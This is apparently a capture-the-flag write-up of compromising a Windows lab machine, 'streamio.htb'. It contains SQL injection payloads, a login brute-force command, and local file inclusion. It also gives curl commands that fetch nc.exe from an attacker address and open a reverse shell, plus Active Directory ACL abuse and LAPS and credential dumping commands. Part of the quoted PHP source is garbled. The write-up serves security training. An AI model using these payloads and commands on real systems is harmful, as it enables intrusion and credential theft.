## PORT 389 (LDAP)
Running `enum4linux` to enumerate LDAP
It didn't found anything so moving onto smb for checking null authenticatioin
## PORT 139/445 (SMB)
Using `smbclient` to see if we can list shares with null authentication
## PORT 443 (HTTPS)
### streamIO.htb
We can see three usernames on `about.php` so they might be helpful for us later
There's also a login page, so testing for deafult credentials and sqli
Which neither worked
We have an option to register for account so let's do that
But even after registering an account we were not able to login
Ran `gobuster` to fuzz for files and directories which showed an `admin` directory but it was forbidden to access
Running gobuster on `/admin/` showed some interesting files
Here `master.php` display a message about being accessed through includes so I wasn't sure what it was talking about
### watch.streamio.htb
Running gobuster on this site showed some php files
Checking the `search.php` it lets us search for a movie name
Clicking on any of the movie name to watch it's going to show us a prompt that it isn't available to watch
This would be retrieving the names of the movie from a database so tried for a sqli with payload
```
d' or 1=1 --
```
Which got blocked, I replaced or with and, and it didn't caught the payload
```
d' and 1=1 --
```
Let's run sqlmap to see if we can dump the database
It was able to determine that it was indeed vulnerable
But it wasn't able to detemine the database reaon could be because of blocked.php filtering the payloads so we need to dump the database manually
For that I tried finding the number of columns but it wasn't returning any error it was hard to identify the columns by including `@@version` in the column and then increasing the column if it wasn't showing in return
```sql
uwu' union select 1,@@version,3,4,5,6 --
```
We know that the MSSQL is being used so now we need to enumerate tables for that we can use this payload
```sql
uwu' union select 1,table_name,3,4,5,6 from information_schema.tables --
```
There's a `users` table , we need now need to know what columns exists in this table
```sql
uwu' union select 1,column_name,3,4,5,6 from information_schema.columns where table_name= 'users' --
```
We can then extract username and password columns
```sql
uwu' union select 1,username,3,4,5,6 from users --
```
```sql
uwu' union select 1,password,3,4,5,6 from users --
```
To make it easy, we can concatenate both columns to get a better result
```sql
uwu' union select 1,concat(username,':',password),3,4,5,6 from users --
```
Using `curl` we can make a POST request without sqli payload and then use `sed ` and `awk` to get the usernames and passwords
```bash
curl -X POST 'https://watch.streamio.htb/search.php' -d 'q=uwu%27%20union%20select%201%2Cconcat%28username%2C%27%3A%27%2Cpassword%29%2C3%2C4%2C5%2C6%20from%20users%20%2D%2D' -k -s | grep h5 | sed -e 's/` with null character , the same with `
` and then removing the tabs before the usernames with `tr -d "\t"`
We are now only left with usernames and password hashes which we can seperate using `awk` , `awk -F: '{print $1}'``
This cracked 12 hashes out of 30, so now let's try to perform bruteforce on login
We can use burpsuite or hydra to perform bruteforce but I found a tool named `patator` which I recently started to like for bruteforcing and fuzzing
```bash
python3 /opt/patator/patator.py http_fuzz 'url=https://streamio.htb/login.php' method=POST body='username=FILE0&password=FILE1' 0=./users.txt 1=./cracked_passwords.txt -x ignore:fgrep='Login failed'
```
Here to supply different wordlist we can use any name followed by a number like `0` which indicates the first wordlist so in this case `FILE0` and then we define the path to wordlist in `0` , similar we do this with `FILE1` andd then we can use `-x` to ingore the message in the response using `fgrep` for the string `Login Failed
This has found the valid login `yoshide : 66boysandgirls..`, After logging in, we can access the admin panel and can see that this user has access to some functionality
Going through each of the management page, we see a GET parameter
So maybe there's a parameter we are not seeing, so fuzzing it through `wfuzz`, for that we'll need to use yoshihide's session as we cannot access admin without being authenticated
```bash
wfuzz -c -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt -u 'https://streamio.htb/admin/?FUZZ' -b 'PHPSESSID=j20051o8t1rbshc9doco26al06' --hh 1678
```
This finds a parameter `debug`, and with this we can perform Local File Inclusion to read the master.php file we found in the /admin directory
The contents of the page are changed which means that we were able to include master.php file, so now to view the source code, we can use a php base64 filter to encode the contents of the page so that the browser doesn't execute the php code and we can get source code
```php
https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php
```
```php
yrMovie managment
"buffered")); } $query = "select * from movies order by movie"; $res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered")); while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC)) { ?>Staff managment
"buffered")); if(isset($_POST['staff_id'])) { ?> Message sent to administrator
"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>
We have command execution, so let's try getting a shell by downloading `nc` and executing it
```bash
curl -X POST 'https://streamio.htb/admin/?debug=master.php&cmd=curl+10.10.14.26:2222/nc.exe+-o+C:\Windows\Temp\nc.exe' -k -b 'PHPSESSID=bg2lbvk5d9pvrjub67e5aib3rk' -d 'include=http://10.10.14.26:2222/test.php'
```
```bash
curl -X POST 'https://streamio.htb/admin/?debug=master.php&cmd=C:\Windows\Temp\nc.exe+10.10.14.26+3333+-e+cmd.exe' -k -b 'PHPSESSID=bg2lbvk5d9pvrjub67e5aib3rk' -d 'include=http://10.10.14.26:2222/test.php'
```
Running `whoami` will return that we are yoshihde user on the system
And this user is a normal domain user, checking `C:\Users` there two users `Matrin` and `nikk37` but we don't have access to these directories
Uploading `sharphound.exe` to gather data about the domain
To transfer this on to our local machine, we can copy the archive file to `C:\inetpub\streamio.htb` and download the file from the site
```bash
https://streamio.htb/20220611010818_BloodHound.zip
```
Unzip the archive from which we'll get json files and upload them to bloodhound GUI
Looking through the pre-built quries I didn't find any way to escalate from yoshihide to any user
Jdgood seems to be write owner of `Core Staff` group which can read LASPS other than that there was nothing interesting.
We can find credentials for `db_user` from `login.php`
Also we can find password for `db_admin`
I tried using `sqlcmd` to login using cmd but it failed
Later uploaded `chisel` to port forward port 1433
With `sqsh` we can login to MSSQL and execute quries in the `STREAMIO` database
But we already know that only tables exits in this database, so let's see if there are any other databases
```sql
SELECT name FROM master.dbo.sysdatabases;
go
```
This shows a database named `streamio_backup`
But db_user isn't able to access this database, we already have the credentials for db admin so let's use that to access this database
Listing the tables with
```sql
SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'
```
We can see a users table having 8 users
That has nikk37's hash which is a user on the system, checking if crackstation can crack this hash
Since winrm is open pn the box, we can use `evil-winrm` to login as nikk37
After getting a shell as nikk37 I ran `winpeas.bat` which showed that there was a firefox profile
From here we only need `logins.json` and `key4.db`, we can use impacket's smb server to transfer files
Using `firepwd` a python script to decrypt firefox passwords we can get the passwords from the logins.json and key4.db by having them in the same directory
https://github.com/lclevy/firepwd
Brute forcing the passwords we'll get `JDg0dd1s@d0p3cr3@t0r` as the correct password
Jdgodd isn't in remote desktop user so we can't get a shell or execute commands but we can use the credentials in the process as this user is WriteOwner of `Core Staff` group
First we'll need to create a credential object so that credentials can be used in the process
```powershell
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $SecPassword)
```
Next use powerview to make the user the owner of the group
```powershell
Set-DomainObjectOwner -Credential $Cred -Identity "CORE STAFF" -OwnerIdentity "JDgodd"
```
Adding all rights to the group
```powershell
Add-DomainObjectAcl -TargetIdentity "CORE STAFF" -PrincipalIdentity JDgodd -Rights All -Verbose -Credential $Cred
```
Adding Jdogdd to the group as the member
```powershell
Add-DomainGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Credential $cred -Verbose
```
Now we can read LAPS password through crackmapexec and can login as the administrator
```bash
cme ldap streamio.htb -d streamio.htb -u 'JDgodd' -p 'JDg0dd1s@d0p3cr3@t0r' -M laps
```
Being an administrator as he's a domain admin, we can dump NTDS.dit with `secretsdump.py` `from impacket
## References
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md
- https://stackoverflow.com/questions/9953448/how-to-remove-all-white-spaces-from-a-given-text-file
- https://github.com/lanjelot/patator
- https://stackoverflow.com/questions/5477163/how-to-switch-database-context-to-newly-created-database
- https://stackoverflow.com/questions/147659/get-list-of-databases-from-sql-server
- https://github.com/jpillora/chisel/releases/tag/v1.7.7
- https://www.sqlshack.com/working-sql-server-command-line-sqlcmd/
- https://github.com/lclevy/firepwd